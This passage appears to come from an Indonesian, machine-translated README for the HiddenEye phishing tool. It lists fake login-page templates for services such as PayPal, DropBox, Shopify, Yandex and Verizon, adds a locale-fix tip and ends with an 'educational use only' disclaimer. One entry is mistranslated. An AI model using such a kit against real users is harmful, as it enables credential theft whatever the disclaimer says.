22) Quora PHISHING:
  • Halaman Login Quora Tradisional
23) PornHub PHISHING:
  • Halaman Login PornHub Tradisional
24) Adobe PHISHING:
  •  Halaman Masuk Adobe Tradisional
25) Badoo PHISHING:
  • Halaman Login Badoo Tradisional
26) CryptoCurrency PHISHING:
  • Halaman Masuk CryptoCurrency Tradisional
27) DevianArt PHISHING: 
  • Halaman Login Tradisional DevianArt
28) DropBox PHISHING:
  • Halaman Masuk DropBox Tradisional
29) PEMESANAN eBay: 
  • Halaman Login eBay Tradisional
30) MySpace PHISHING:
  • Halaman Login Myspace Tradisional
31) PHISHING PayPal: 
  •  Halaman Login PayPal Tradisional
32) Shopify PHISHING: 
  • Halaman Login Shopify Tradisional
33) Verizon PHISHING: 
  • Halaman Login Verizon Tradisional
34) PHISHING Yandex:
  • Halaman Masuk Yandex Tradisional 
Ascii error fix
dpkg-reconfigure locales
Then select: "All locales" Then select "en_US.UTF-8"
After that reboot your machine. Then open terminal and run the command: "locale"
There you will see "en_US.UTF-8" which is the default language. Instead of POSIX.

PENOLAKAN
HANYA DIGUNAKAN UNTUK TUJUAN PENDIDIKAN
Penggunaan HiddenEye adalah TANGGUNG JAWAB LENGKAP-PENGGUNA AKHIR. Pengembang tidak bertanggung jawab dan TIDAK bertanggung jawab atas penyalahgunaan atau kerusakan yang disebabkan oleh program ini. Silakan baca LISENSI.